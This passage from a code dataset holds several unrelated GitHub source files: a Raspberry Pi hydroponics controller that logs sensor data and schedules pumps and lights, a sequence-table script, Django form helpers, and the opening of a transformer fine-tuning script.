telegram\r\nimport board\r\nimport busio\r\nfrom adafruit_htu21d import HTU21D\r\nimport configparser\r\n\r\nfrom bme280 import BME280\r\nfrom ltr559 import LTR559\r\n\r\nimport sqlite3\r\n\r\n\r\nfrom PIL import Image, ImageFont, ImageDraw\r\nimport ST7735 as ST7735\r\nfrom fonts.ttf import Roboto as UserFont\r\n\r\n# Create ST7735 LCD display class.\r\ndisp = ST7735.ST7735 (\r\n port=0,\r\n cs=1,\r\n dc=9,\r\n backlight=12,\r\n rotation=270,\r\n spi_speed_hz=1000000\r\n)\r\n\r\n\r\nconfig = configparser.ConfigParser()\r\nconfig.read ('SpaceVegetablesClient.ini')\r\n\r\n\r\n\"\"\" Remove text is draw a rectangle\r\n where text is written\r\n 0 = temperature\r\n 1 = humidity\r\n 2 = ph\r\n 3 = tds\r\n\"\"\"\r\ndef removeText():\r\n rectElements = [17, 32, 47, 63]\r\n del_rectangle = 40\r\n\r\n for i in range(4):\r\n # draw the rectangle in all elements\r\n draw.rectangle ((118, rectElements[i], 118 + del_rectangle, rectElements[i] + 15), (255, 182, 141))\r\n\r\n # draw.rectangle ((118, rectElements[element], 118 + del_rectangle, rectElements[element] + 15), (255, 182, 141))\r\n return 0\r\n\r\n\"\"\" Write text to the LCD \"\"\"\r\n\r\ndef writeText (elements):\r\n disp.set_backlight(1)\r\n rectElements = [17, 32, 47, 63]\r\n for i in range(4):\r\n draw.text((118,rectElements[i]), elements[i], font=font, fill=(255, 255, 255))\r\n\r\n disp.display(image)\r\n time.sleep(300)\r\n disp.set_backlight(0)\r\n return 0\r\n\r\n\r\n\"\"\" threads to function above write text\r\n only write text needs thread\r\n the removetext is called before to erase any previous values\r\n\"\"\"\r\ndef tWriteText(elements):\r\n log.info(\"Thread to write text\")\r\n twt = threading.Thread(target = writeText, args=(elements,))\r\n twt.setName ('Write text')\r\n twt.start()\r\n\r\nfont_size = 13\r\nfont = ImageFont.truetype(UserFont, font_size)\r\n\r\n# Initialise display.\r\ndisp.begin()\r\n\r\nimage = Image.open(config['default']['backgroundImage'])\r\ndraw = ImageDraw.Draw(image)\r\ndisp.display(image)\r\n\r\n\r\n# constants\r\n# ThingSpeak\r\nTSUrl = config['thingspeak']['url']\r\n\r\n# temperature/humidity/pressure - enviro\r\nbme280 = BME280()\r\n\r\n# temperature/humidity HTU21\r\ni2c = busio.I2C (board.SCL, board.SDA)\r\nsensorhtu21d = HTU21D(i2c)\r\n\r\n# sleep time is in seconds\r\n# multiply per 60 for minutes\r\n# airPumpTimeOn = 60 * 15 # 15 minutes\r\n#waterPumpTimeOn = 60 * 20 # 20 minutes \r\n# lightsTimeOn = 60 * 60 * 10 # 10 hour\r\n\r\nairPumpTimeOn = int(config['default']['airpumptimeon']) * 60 # 15 minutes\r\nwaterPumpTimeOn = int(config['default']['waterpumptimeon']) * 60 # 20 minutes \r\nlightsTimeOn = int(config['default']['lightstimeon']) * 60 * 60 # 10 hour\r\n\r\n# Server_IP_address = \"192.168.2.77\"\r\nServer_IP_address = config['default']['serverIpAddress']\r\n\r\n# Telegram token\r\ntoken = config['telegram']['telegramToken']\r\nchatId = config['telegram']['chatId']\r\n\r\n\"\"\" This function sends a message to Telegram \"\"\"\r\n\"\"\" Going to use only to main functions \"\"\"\r\ndef sendMessageTelegram (msg, \r\n chat_id = chatId,\r\n token = token):\r\n msg = \"EnviroPI: \" + msg\r\n bot = telegram.Bot(token=token)\r\n try:\r\n bot.sendMessage(chat_id=chat_id, text=msg)\r\n except telegram.error.NetworkError:\r\n # If there's some problem, handling the exception\r\n # so the SpaceVegetablesClient will not exit with an error\r\n # If cannot reach telegram or internet, just continue\r\n pass\r\n\r\n\r\n\"\"\" Read TDS values from Arduino Pro Micro \"\"\"\r\ndef getTDS():\r\n ser = serial.Serial('/dev/ttyACM0', 9600, timeout=1)\r\n readtds = ser.readline().decode('utf-8').rstrip()\r\n return (readtds)\r\n\r\n\"\"\" LOGGING \"\"\"\r\nlog = logging.getLogger('SpaceVegetablesClient')\r\nlog_fmt = logging.Formatter(\"%(levelname)s %(message)s\")\r\nlog_ch = JournalHandler()\r\nlog_ch.setFormatter(log_fmt)\r\nlog.addHandler(log_ch)\r\nlog.setLevel(logging.DEBUG)\r\n\r\n\r\n\"\"\" Functions definitions \"\"\"\r\n\r\n\"\"\" DATABASE FUNCTIONS \"\"\"\r\n\"\"\" This will get environmental condiditions\r\n and populate the database with those conditions\r\n\"\"\"\r\nbme280 = BME280()\r\nltr559 = LTR559()\r\n\r\ndef sendToThingSpeak (url):\r\n log.info (\"Updating ThingSpeak\")\r\n toUpdate = TSUrl + url\r\n f = urllib3.PoolManager()\r\n response = f.request('GET',toUpdate)\r\n\r\n\r\ndef get_cpu_temperature():\r\n process = Popen(['/usr/bin/vcgencmd', 'measure_temp'], stdout=PIPE, universal_newlines=True)\r\n output, _error = process.communicate()\r\n return float(output[output.index('=') + 1:output.rindex(\"'\")])\r\n\r\ndef environmentalConditions(conn):\r\n print(\"Getting environmental data\")\r\n log.info(\"Getting environmental data\")\r\n # get data\r\n #temperature = round(bme280.get_temperature(),1)\r\n humidity = round(bme280.get_humidity(),1)\r\n pressure = round(bme280.get_pressure(),1)\r\n lux = round(ltr559.get_lux(),1)\r\n\r\n\r\n #smooth cpu temperature\r\n cpu_temps = [get_cpu_temperature()] * 5\r\n\r\n factor = 7.00\r\n\r\n cpu_temp = get_cpu_temperature()\r\n cpu_temps = cpu_temps[1:] + [cpu_temp]\r\n avg_cpu_temp = sum(cpu_temps) / float (len(cpu_temps))\r\n raw_temp = bme280.get_temperature()\r\n\r\n temperature = round(raw_temp - ((avg_cpu_temp - raw_temp) / factor),1)\r\n\r\n\r\n humidityInside = round(sensorhtu21d.relative_humidity,1)\r\n temperatureInside = round(sensorhtu21d.temperature,1)\r\n \r\n #get TDS\r\n tds = getTDS()\r\n \r\n # get datetime\r\n dt = datetime.datetime.now()\r\n # format the date time to insert into the database\r\n dtdb = dt.strftime (\"%Y-%m-%d %H:%M:%S\")\r\n\r\n curs = conn.cursor()\r\n\r\n log.info(\"Populating database with environmental data\")\r\n curs.execute (\"\"\" insert into Vegetables (TDS,temperature,humidity,pressure,lightSensor,temperatureInside,humidityInside,dateTime) values ((?),(?),(?),(?),(?),(?),(?),(?)) \"\"\", (tds, temperature, humidity, pressure, lux, temperatureInside, humidityInside,dtdb))\r\n conn.commit()\r\n\r\n # Send to thingspeak\r\n log.info(\"Updating ThingSpeak\")\r\n field1 = str(temperatureInside)\r\n field2 = str(humidityInside)\r\n field3 = str(pressure)\r\n field4 = str(lux)\r\n field5 = str(tds)\r\n field6 = str(0)\r\n\r\n toUpdate = \"&field1=\" + field1 + \"&field2=\" + field2 + \"&field3=\" + field3 + \"&field4=\" + field4 + \"&field5=\" + field5 + \"&field6=\" + field6\r\n sendToThingSpeak (toUpdate)\r\n # update display\r\n # remove all from display\r\n removeText()\r\n disp.display(image)\r\n # update\r\n toOSD = [field1, field2, field6, field5]\r\n tWriteText(toOSD)\r\n\r\n\r\n\r\ndef setDBWaterPump(conn,pumpState):\r\n log.info(\"Populating water pump state into database\")\r\n # get datetime\r\n dt = datetime.datetime.now()\r\n # format the date time to insert into the database\r\n dtdb = dt.strftime (\"%Y-%m-%d %H:%M:%S\")\r\n\r\n curs = conn.cursor()\r\n curs.execute (\"\"\" insert into Vegetables (waterPumpActive, dateTime) values ((?), (?)) \"\"\", (pumpState, dtdb))\r\n conn.commit()\r\n\r\n toUpdate = \"&field7=\" + str(pumpState)\r\n sendToThingSpeak(toUpdate)\r\n\r\n\r\ndef setDBAirPump(conn,pumpState):\r\n log.info(\"Populating air pump state into database\")\r\n # get datetime\r\n dt = datetime.datetime.now()\r\n # format the date time to insert into the database\r\n dtdb = dt.strftime (\"%Y-%m-%d %H:%M:%S\")\r\n\r\n curs = conn.cursor()\r\n curs.execute (\"\"\" insert into Vegetables (airPumpActive, dateTime) values ((?), (?)) \"\"\", (pumpState, dtdb))\r\n conn.commit()\r\n\r\n toUpdate = \"&field8=\" + str(pumpState)\r\n sendToThingSpeak(toUpdate)\r\n\r\n\r\ndef setDBLights(conn,lightsState):\r\n log.info(\"Populating lights state into database\")\r\n # 0 - off\r\n # 1 - on\r\n # get datetime\r\n dt = datetime.datetime.now()\r\n # format the date time to insert into the database\r\n dtdb = dt.strftime (\"%Y-%m-%d %H:%M:%S\")\r\n\r\n curs = conn.cursor()\r\n curs.execute (\"\"\" insert into Vegetables (lightsActive, dateTime) values ((?), (?)) \"\"\", (lightsState, dtdb))\r\n conn.commit()\r\n\r\n\"\"\" Lights will have their own timer \"\"\"\r\n\r\n\"\"\" \r\nStart and stop Air Pump for oxigenation of water\r\n\"\"\"\r\ndef airPump(conn):\r\n prctl.set_name(\"Air Pump\")\r\n # to OSD\r\n sendMessageTelegram(\"Activating Air Pump\")\r\n log.info(\"Activating air pump into automationPI\")\r\n server = xmlrpc.client.ServerProxy ('http://' + Server_IP_address + ':8000', allow_none=True)\r\n server.turnAirPump(1)\r\n # set air pump db\r\n setDBAirPump(conn,1)\r\n time.sleep(airPumpTimeOn)\r\n sendMessageTelegram(\"Stoping Air Pump\")\r\n log.info(\"Deactivating air pump into automationPI\")\r\n server.turnAirPump(0)\r\n setDBAirPump(conn,0)\r\n\r\n\"\"\" \r\nStart and stop water pump for NFC\r\n\"\"\"\r\ndef waterPump(conn):\r\n # set thread name\r\n prctl.set_name(\"Water Pump\")\r\n log.info(\"Activating water pump into automationPI\")\r\n sendMessageTelegram(\"Activating water pump Pump\")\r\n server = xmlrpc.client.ServerProxy ('http://' + Server_IP_address + ':8000', allow_none=True)\r\n server.turnWaterPump(1)\r\n setDBWaterPump(conn,1)\r\n time.sleep(waterPumpTimeOn)\r\n sendMessageTelegram(\"Stoping water Pump\")\r\n log.info(\"Deactivating water pump into automationPI\")\r\n server.turnWaterPump(0)\r\n setDBWaterPump(conn,0)\r\n return 0\r\n\r\n\"\"\" OLD: Before testing resulted in success\r\n with one function to control all\r\n\"\"\"\r\n#def turnLights(conn):\r\n# prctl.set_name(\"Lights\")\r\n# log.info(\"Turnin on lights into automationPI\")\r\n# sendMessageTelegram (\"Turning On Lights\")\r\n# server = xmlrpc.client.ServerProxy ('http://' + Server_IP_address + ':8000', allow_none=True)\r\n# server.turnLightsv2()\r\n# setDBLights(conn,1)\r\n\r\n\r\ndef turnLights(conn):\r\n prctl.set_name(\"Lights\")\r\n log.info(\"Turning on lights into automationPI\")\r\n sendMessageTelegram (\"Turning On Lights\")\r\n server = xmlrpc.client.ServerProxy ('http://' + Server_IP_address + ':8000', allow_none=True)\r\n server.turnLights(1)\r\n setDBLights(conn,1)\r\n time.sleep(lightsTimeOn)\r\n #server = xmlrpc.client.ServerProxy ('http://' + Server_IP_address + ':8000', allow_none=True)\r\n log.info(\"Turning off lights\")\r\n sendMessageTelegram(\"Turnin off lights\")\r\n server.turnLights(0)\r\n setDBLights(conn,0)\r\n return 0\r\n\r\n\r\n\"\"\" The functions to spawn threads \"\"\"\r\ndef tAirPump(conn):\r\n log.info(\"Thread to air pump\")\r\n ax = threading.Thread (target = airPump, args=(conn,))\r\n ax.setName ('Air Pump')\r\n ax.start()\r\n return 0\r\n\r\ndef tWaterPump(conn):\r\n log.info(\"Thread to water pump\")\r\n aw = threading.Thread (target = waterPump,args=(conn,))\r\n aw.setName('Water Pump')\r\n aw.start()\r\n return 0\r\n\r\ndef tLights(conn):\r\n log.info(\"Thread to lights\")\r\n atl = threading.Thread (target = turnLights,args=(conn,))\r\n atl.setName('Lights')\r\n atl.start()\r\n return 0\r\n\r\n\"\"\" In case of a power outage, check if the lights should be active\r\n because the instructions to turn the lights on\r\n comes from the client - that is schedule at 8am\r\n if it reboots, it will schedule for next day 8am\r\n\r\n This function will run before the main function\r\n It only runs once, when the program starts\r\n like if a reboot or startup\r\n\"\"\"\r\n\r\ndef checkActiveLights():\r\n global lightsTimeOn\r\n log.info(\"Checking if lights needed to be active\")\r\n now = datetime.datetime.now().time()\r\n start8am = datetime.time(8,0,0)\r\n end18pm = datetime.time(18,0,0)\r\n if now > start8am and now < end18pm:\r\n #need to turn them on\r\n #but make some time diferences\r\n toend = datetime.datetime.combine(datetime.date.today(),end18pm)\r\n tonow = datetime.datetime.combine(datetime.date.today(),now)\r\n stilLit = toend - tonow\r\n lightsTimeOn = round(stilLit.total_seconds(),0)\r\n msg = \"Power outage. Turning lights on for: \" + str(lightsTimeOn)\r\n sendMessageTelegram (msg)\r\n log.info(msg)\r\n # call the functions to turn the lights\r\n tLights(conn)\r\n else:\r\n log.info(\"Not the corret time to activate lights\")\r\n\r\n return 0\r\n\r\n\r\n\"\"\"\r\n Reseting here the light time because\r\n if there's a power outage, this variable gets changed\r\n to the time left until 18:00. If nothing more happens\r\n that value remains, so, next time at 0800, when the lights\r\n turn on, the last value remains and the lights turn off at that time\r\n called everyday at 07:50\r\n\"\"\"\r\ndef resetLightsTime():\r\n global lightsTimeOn\r\n lightsTimeOn = 60 * 60 * 10 #10 hours\r\n return 0\r\n\r\n\r\ndef checkActiveThreads():\r\n ac = threading.activeCount()\r\n log.info (\"There are %s threads active\", str(ac))\r\n sendMessageTelegram(\"There are \" + str(ac) + \" threads active\")\r\n message = str(threading.enumerate())\r\n log.info(message)\r\n sendMessageTelegram (message)\r\n return 0\r\n\r\n#set sqlite3 connection\r\nlog.info (\"Connecting to database\")\r\nconn = sqlite3.connect(\"/home/pi/SpaceVegetablesClient/spaceVegetables.db\", check_same_thread=False)\r\n\"\"\" Scheduling \"\"\"\r\n\r\n# Schedules for water and air pump\r\n\"\"\" Turn water pump every hour for about 15m \"\"\"\r\n\"\"\" airPumpTimedOn \"\"\" \r\nlog.info(\"Scheduling air pump\")\r\nschedule.every().day.at(\"09:00\").do(tAirPump,conn)\r\n#schedule.every().day.at(\"11:00\").do(tAirPump,conn)\r\nschedule.every().day.at(\"13:00\").do(tAirPump,conn)\r\n#schedule.every().day.at(\"15:00\").do(tAirPump,conn)\r\nschedule.every().day.at(\"17:00\").do(tAirPump,conn)\r\n#schedule.every().day.at(\"19:00\").do(tAirPump,conn)\r\nschedule.every().day.at(\"21:00\").do(tAirPump,conn)\r\n\r\n\r\n\"\"\" Schedule - for now\r\nThe more the plants grow, the more time it needs to be pumping\r\nIn the off ligths period (night time), no pumping is needed\r\nSo, we're goint to specify every time\r\nIt's the only way\r\nRemember to check the waterPumpTimedOn \r\n20m every 1.5 hours - for starters\r\n\"\"\"\r\nlog.info(\"Scheduling water pump\")\r\nschedule.every().day.at(\"08:00\").do(tWaterPump,conn)\r\nschedule.every().day.at(\"09:30\").do(tWaterPump,conn)\r\nschedule.every().day.at(\"11:00\").do(tWaterPump,conn)\r\nschedule.every().day.at(\"12:30\").do(tWaterPump,conn)\r\nschedule.every().day.at(\"14:00\").do(tWaterPump,conn)\r\nschedule.every().day.at(\"15:30\").do(tWaterPump,conn)\r\nschedule.every().day.at(\"17:00\").do(tWaterPump,conn)\r\nschedule.every().day.at(\"18:30\").do(tWaterPump,conn)\r\nschedule.every().day.at(\"20:00\").do(tWaterPump,conn)\r\n\r\n\r\n# Turn lights on\r\nlog.info(\"Scheduling lights on\")\r\nschedule.every().day.at(\"08:00\").do(tLights,conn)\r\n\r\n# Environmental conditions\r\nlog.info(\"Scheduling environmental conditions\")\r\nschedule.every(30).minutes.do(environmentalConditions,conn)\r\n\r\n# Scheduling reset lights time\r\nlog.info(\"Scheduling lights time reset\")\r\nschedule.every().day.at(\"07:50\").do(resetLightsTime)\r\n\r\n# threads active\r\nlog.info(\"scheduling active threads\")\r\nschedule.every(4).hours.do(checkActiveThreads)\r\n\r\n# Check if lights needed to be started\r\n# power outage and this function executes just at program start\r\ncheckActiveLights()\r\n\r\nevent = threading.Event()\r\n\r\nsendMessageTelegram (\"Starting server\")\r\nwhile True:\r\n schedule.run_pending()\r\n time.sleep(1)\r\n\r\n","repo_name":"feiticeir0/SpaceVegetables","sub_path":"SpaceVegetablesClient/SpaceVegetablesClient.py","file_name":"SpaceVegetablesClient.py","file_ext":"py","file_size_in_byte":15155,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"68"} +{"seq_id":"9259336789","text":"import dinopy\nimport pandas as pd\nimport tables\nimport numpy as np\n\nf_names = []\nuniq_seqs = []\nfor i in range(len(snakemake.input)):\n seqs = dinopy.FastaReader(snakemake.input[i])\n uniq_seqs = uniq_seqs + list(set([entry.sequence.decode() for entry in seqs.entries()]))\nuniq_seqs = set(uniq_seqs)\n\n# create empty matrix and fill, all other solutions cost too much memory\nsample_names = [i.split(\"/\")[-1].split(\".\")[0] for i in snakemake.input]\ndf = pd.DataFrame(0, index=uniq_seqs, columns=sample_names, dtype=np.uint16)\n\n# fill matrix\nfor i in range(len(snakemake.input)):\n sample_name = sample_names[i]\n seqs = dinopy.FastaReader(snakemake.input[i])\n for entry in seqs.entries():\n seq = entry.sequence.decode()\n value = np.uint16(entry.name.decode().split(\"size=\")[1].split(\";\")[0])\n df.at[seq, sample_name] = value\n\n# save to file\ndf.index.name = \"sequences\"\ndf.to_hdf(snakemake.output[1], key='df', mode='w')\ndf.to_csv(snakemake.output[0])\n","repo_name":"MW55/Natrix","sub_path":"scripts/unfiltered_table.py","file_name":"unfiltered_table.py","file_ext":"py","file_size_in_byte":981,"program_lang":"python","lang":"en","doc_type":"code","stars":30,"dataset":"github-code","pt":"68"} +{"seq_id":"20862891266","text":"from django.forms import ModelForm, fields\nfrom django.forms.widgets import ClearableFileInput\nfrom django.core.files.uploadedfile import UploadedFile\nfrom django.core import validators\nfrom django.utils.encoding import smart_text\n\nfrom .views import chunkUploadedFile\n\nimport re\nfrom datetime import datetime, date\n\nclass ModelFormWithMeta(ModelForm):\n def __init__(self, *args, **kwargs):\n ret = super(ModelFormWithMeta, self).__init__(*args, **kwargs)\n if self.instance:\n rel = getattr(self.instance, self.Meta.meta_set)\n extension = getattr(self.Meta, 'meta_fields_extension', ())\n extended = getattr(self.Meta, 'meta_extended_fields', {})\n for f in self.Meta.meta_fields:\n keyval = f\n value_field = self.Meta.meta_fields[f]\n values = value_field.split('.', 1)\n if len(values) == 2:\n keyval = values[0]\n value_field = values[1]\n\n args = { getattr(self.Meta, 'meta_key', 'key'): keyval }\n m = rel.filter(**args)[:1]\n if len(m) > 0:\n self.initial[f] = getattr(m[0], value_field, None)\n for e in extension:\n self.initial[f + \"__\" + e] = getattr(m[0], e, None)\n for e in extended.get(f, []):\n self.initial[extended[f][e]] = getattr(m[0], e, None)\n\n return ret\n\n def _save_meta(self):\n rel = getattr(self.instance, self.Meta.meta_set)\n extension = getattr(self.Meta, 'meta_fields_extension', ())\n extended = getattr(self.Meta, 'meta_extended_fields', {})\n for f in self.Meta.meta_fields:\n keyval = f\n value_field = self.Meta.meta_fields[f]\n values = value_field.split('.', 1)\n if len(values) == 2:\n keyval = values[0]\n value_field = values[1]\n\n meta_key = getattr(self.Meta, 'meta_key', 'key')\n m = rel.filter(**{ meta_key: keyval })[:1]\n\n # all meta attributes to be changed\n mattr = {}\n if f in self.data or self.cleaned_data.get(f):\n mattr[value_field] = self.cleaned_data[f]\n for e in extension:\n ef = f + \"__\" + e\n if ef in self.data:\n mattr[e] = self.cleaned_data[ef]\n if f in extended:\n for e in extended[f]:\n if e in self.data:\n mattr[extended[f][e]] = self.data[e]\n\n if len(mattr) > 0:\n if len(m) == 0 and (f in self.data or self.cleaned_data.get(f)):\n # new relationship\n mattr[meta_key] = keyval\n rel.create(**mattr)\n elif len(m) > 0:\n # update existing\n for f in mattr:\n setattr(m[0], f, mattr[f])\n m[0].save()\n\n def save(self, commit=True):\n def save_meta():\n self._save_meta_m2m()\n self._save_meta()\n\n instance = super(ModelFormWithMeta, self).save(commit=commit)\n if commit:\n save_meta()\n else:\n self._save_meta_m2m = self.save_m2m\n self.save_m2m = save_meta\n return instance\n\nclass ResumableFileInput(ClearableFileInput):\n def value_from_datadict(self, data, files, name):\n upload = super(ResumableFileInput, self).value_from_datadict(data, files, name)\n if not upload:\n if name + '.path' in data and name + '.name' in data and name + '.content_type' in data and name + '.size' in data:\n try:\n f = open(data.get(name + '.path'))\n except OSError:\n pass\n else:\n upload = UploadedFile(file=f, name=data.get(name + '.name'), content_type=data.get(name + '.content_type'), size=data.get(name + '.size'))\n if not upload:\n if name + '_sessionid' in data:\n try:\n upload = chunkUploadedFile(data.get('__request'), data.get(name + '_sessionid'))\n except OSError:\n pass\n\n if upload:\n files[name] = upload\n return upload\n\nclass DateField(fields.DateField):\n def to_python(self, value):\n if value == None or value == '':\n return None\n elif type(value) in (int,float):\n return date.fromtimestamp(value)\n elif type(value) in (str,str) and re.match('^-?[0-9]+$', value):\n try:\n return date.fromtimestamp(int(value))\n except:\n pass\n if type(value) is datetime:\n return value.date()\n return super(fields.DateField, self).to_python(value)\n\nclass DateTimeField(fields.DateTimeField):\n def __init__(self, *args, **kwargs):\n ret = super(fields.DateTimeField, self).__init__(*args, **kwargs)\n \n def to_python(self, value):\n if value == None or value == '':\n return None\n elif type(value) in (int,float):\n return datetime.fromtimestamp(value)\n elif type(value) in (str,str) and re.match('^-?[0-9]+$', value):\n try:\n return datetime.fromtimestamp(int(value))\n except:\n pass\n return super(fields.DateTimeField, self).to_python(value)\n\nclass CommaSeparatedListField(fields.Field):\n def __init__(self, max_items=None, min_items=None, *args, **kwargs):\n self.max_items, self.min_items = max_items, min_items\n super(CommaSeparatedListField, self).__init__(*args, **kwargs)\n if min_items is not None:\n self.validators.append(validators.MinLengthValidator(min_items))\n if max_items is not None:\n self.validators.append(validators.MaxLengthValidator(max_items))\n \n def to_python(self, value):\n if value in validators.EMPTY_VALUES:\n return []\n \n if type(value) in (str, str):\n value = value.split(',')\n\n ret = []\n for t in value:\n t = t.strip()\n if t:\n ret.append(str(t))\n\n return ret\n","repo_name":"311labs/restit","sub_path":"rest/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":6316,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"68"} +{"seq_id":"11888179637","text":"\"\"\" Finetuning the library models for sequence classification on GLUE (Bert, XLM, XLNet, RoBERTa, Albert, XLM-RoBERTa).\"\"\"\n\nimport argparse\nfrom log import logger\nfrom sklearn.model_selection import KFold\nimport numpy as np\nimport torch\nimport torch.nn as nn\nfrom sklearn.metrics import f1_score, recall_score, precision_score, accuracy_score\nfrom torch.utils.data import DataLoader, RandomSampler, SequentialSampler, TensorDataset\nfrom torch.utils.data.distributed import DistributedSampler\nfrom tqdm import tqdm, trange\nfrom prior_wd_optim import PriorWD\nimport pandas as pd\nfrom transformers import (\n WEIGHTS_NAME,\n AdamW,\n AlbertConfig,\n AlbertForSequenceClassification,\n AlbertTokenizer,\n BertConfig,\n BertModel,\n BertTokenizer,\n DistilBertConfig,\n DistilBertForSequenceClassification,\n DistilBertTokenizer,\n FlaubertConfig,\n FlaubertForSequenceClassification,\n FlaubertTokenizer,\n RobertaConfig,\n RobertaTokenizer,\n XLMConfig,\n XLMForSequenceClassification,\n XLMRobertaConfig,\n XLMRobertaForSequenceClassification,\n XLMRobertaTokenizer,\n XLMTokenizer,\n XLNetConfig,\n XLNetForSequenceClassification,\n XLNetTokenizer,\n get_linear_schedule_with_warmup,\n BertForSequenceClassification\n)\nfrom models import RobertaForSequenceClassification\nfrom utils import write_to_csv, set_seed\nfrom data import convert_examples_to_features, processors, output_modes\n\ntry:\n from torch.utils.tensorboard import SummaryWriter\nexcept ImportError:\n from tensorboardX import SummaryWriter\n\n\nMODEL_CLASSES = {\n \"bert\": (BertConfig, BertForSequenceClassification, BertTokenizer),\n \"roberta\": (RobertaConfig, RobertaForSequenceClassification, RobertaTokenizer)\n}\n\n\n\ndef convert_examples(args, task, tokenizer, label_list, examples):\n output_mode = output_modes[task]\n features = convert_examples_to_features(\n examples,\n tokenizer,\n label_list=label_list,\n max_length=args.max_seq_length,\n pad_on_left=bool(args.model_type in [\"xlnet\"]), # pad on the left for xlnet\n pad_token=tokenizer.convert_tokens_to_ids([tokenizer.pad_token])[0],\n pad_token_segment_id=4 if args.model_type in [\"xlnet\"] else 0,\n output_mode=output_mode,\n no_label=False\n )\n\n # Convert to Tensors and build dataset\n all_input_ids = torch.tensor([f.input_ids for f in features], dtype=torch.long)\n all_attention_mask = torch.tensor([f.attention_mask for f in features], dtype=torch.long)\n all_token_type_ids = torch.tensor([f.token_type_ids for f in features], dtype=torch.long)\n all_labels = torch.tensor([f.label for f in features], dtype=torch.long)\n dataset = TensorDataset(all_input_ids, all_attention_mask, all_token_type_ids, all_labels)\n return dataset\n\n\ndef get_args():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--use_dropout\", action=\"store_true\", help=\"If specified, uses the information bottleneck to reduce\\\n the dimensions.\")\n parser.add_argument(\"--mixout\", type=float, default=0.0, help=\"mixout probability (default: 0)\")\n parser.add_argument(\n \"--prior_weight_decay\", action=\"store_true\", help=\"Weight Decaying toward the bert params\",\n )\n parser.add_argument(\"--kl_annealing\", choices=[None, \"linear\"], default=None)\n parser.add_argument(\"--evaluate_after_each_epoch\", action=\"store_true\", help=\"Eveluates the model after\\\n each epoch and saves the best model.\")\n parser.add_argument(\"--deterministic\", action=\"store_true\", help=\"If specified, learns the reduced dimensions\\\n through mlp in a deterministic manner.\")\n parser.add_argument(\"--activation\", type=str, choices=[\"tanh\", \"sigmoid\", \"relu\"], \\\n default=\"relu\")\n parser.add_argument(\"--eval_types\", nargs=\"+\", type=str, default=[\"train\", \"test\"], \\\n choices=[\"train\", \"test\", \"dev\"], help=\"Specifies the types to evaluate on,\\\n can be dev, test, train.\")\n parser.add_argument(\"--binarize_eval\", action=\"store_true\", help=\"If specified, binarize the predictions, and\\\n labels during the evaluations in case of binary-class datasets.\")\n # Ib parameters.\n parser.add_argument(\"--beta\", type=float, default=1.0, help=\"Defines the weight for the information bottleneck\\\n loss.\")\n parser.add_argument(\"--ib\", action=\"store_true\", help=\"If specified, uses the information bottleneck to reduce\\\n the dimensions.\")\n parser.add_argument(\"--sample_size\", type=int, default=5, help=\"Defines the number of samples for the ib method.\")\n parser.add_argument(\"--ib_dim\", default=128, type=int,\n help=\"Specifies the dimension of the information bottleneck.\")\n\n # Required parameter\n parser.add_argument(\"--output\", type=str, default=None)\n parser.add_argument(\"--eval_tasks\", nargs=\"+\", default=[], type=str, help=\"Specifies a list of evaluation tasks.\")\n parser.add_argument(\n \"--model_type\",\n default=None,\n type=str,\n required=True,\n help=\"Model type selected in the list: \" + \", \".join(MODEL_CLASSES.keys()),\n )\n parser.add_argument(\n \"--model_name_or_path\",\n default=None,\n type=str,\n required=True,\n help=\"Path to pre-trained model\",\n )\n parser.add_argument(\n \"--task_name\",\n default=None,\n type=str,\n required=True,\n help=\"The name of the task to train selected in the list: \" + \", \".join(processors.keys()),\n )\n # Other parameters\n parser.add_argument(\n \"--config_name\", default=\"\", type=str, help=\"Pretrained config name or path if not the same as model_name\",\n )\n parser.add_argument(\n \"--tokenizer_name\",\n default=\"\",\n type=str,\n help=\"Pretrained tokenizer name or path if not the same as model_name\",\n )\n parser.add_argument(\n \"--max_seq_length\",\n default=128,\n type=int,\n help=\"The maximum total input sequence length after tokenization. Sequences longer \"\n \"than this will be truncated, sequences shorter will be padded.\",\n )\n parser.add_argument(\"--do_train\", action=\"store_true\", help=\"Whether to run training.\")\n parser.add_argument(\"--do_eval\", action=\"store_true\", help=\"Whether to run eval on the dev set.\")\n parser.add_argument(\n \"--evaluate_during_training\", action=\"store_true\", help=\"Run evaluation during training at each logging step.\",\n )\n parser.add_argument(\n \"--per_gpu_train_batch_size\", default=8, type=int, help=\"Batch size per GPU/CPU for training.\",\n )\n parser.add_argument(\n \"--per_gpu_eval_batch_size\", default=64, type=int, help=\"Batch size per GPU/CPU for evaluation.\",\n )\n parser.add_argument(\n \"--gradient_accumulation_steps\",\n type=int,\n default=1,\n help=\"Number of updates steps to accumulate before performing a backward/update pass.\",\n )\n parser.add_argument(\"--learning_rate\", default=2e-5, type=float, help=\"The initial learning rate for Adam.\")\n parser.add_argument(\"--weight_decay\", default=0.0, type=float, help=\"Weight decay if we apply some.\")\n parser.add_argument(\"--adam_epsilon\", default=1e-8, type=float, help=\"Epsilon for Adam optimizer.\")\n parser.add_argument(\"--max_grad_norm\", default=1.0, type=float, help=\"Max gradient norm.\")\n parser.add_argument(\n \"--num_train_epochs\", default=3.0, type=float, help=\"Total number of training epochs to perform.\",\n )\n parser.add_argument(\n \"--max_steps\",\n default=-1,\n type=int,\n help=\"If > 0: set total number of training steps to perform. Override num_train_epochs.\",\n )\n parser.add_argument(\n \"--n_splits\",\n default=None,\n type=int,\n required=True,\n help=\"If > 0: set total number of training steps to perform. Override num_train_epochs.\",\n )\n parser.add_argument(\n \"--cuda\",\n default=\"cuda\",\n type=str,\n help=\"Pretrained tokenizer name or path if not the same as model_name\",\n )\n parser.add_argument(\"--warmup_steps\", default=0, type=int, help=\"Linear warmup over warmup_steps.\")\n\n parser.add_argument('--seeds', nargs='+', type=int, required=False)\n args = parser.parse_args()\n\n args.device = torch.device(args.cuda)\n\n args.task_to_data_dir = {\n \"smell\": \"./data/smell/\",\n \"complexity\": \"./data/complexity/\",\n \"read\": \"./data/read/\",\n }\n return args\n\n\ndef collection(examples, indices):\n temp = []\n for i in indices:\n temp.append(examples[i])\n return temp\n\n\ndef get_config(args):\n processor = processors[args.task_name](args.task_to_data_dir[args.task_name])\n label_list = processor.get_labels()\n num_labels = len(label_list)\n config_class, _, _ = MODEL_CLASSES[args.model_type]\n config = config_class.from_pretrained(\n args.config_name if args.config_name else args.model_name_or_path,\n num_labels=num_labels,\n finetuning_task=args.task_name,\n )\n if 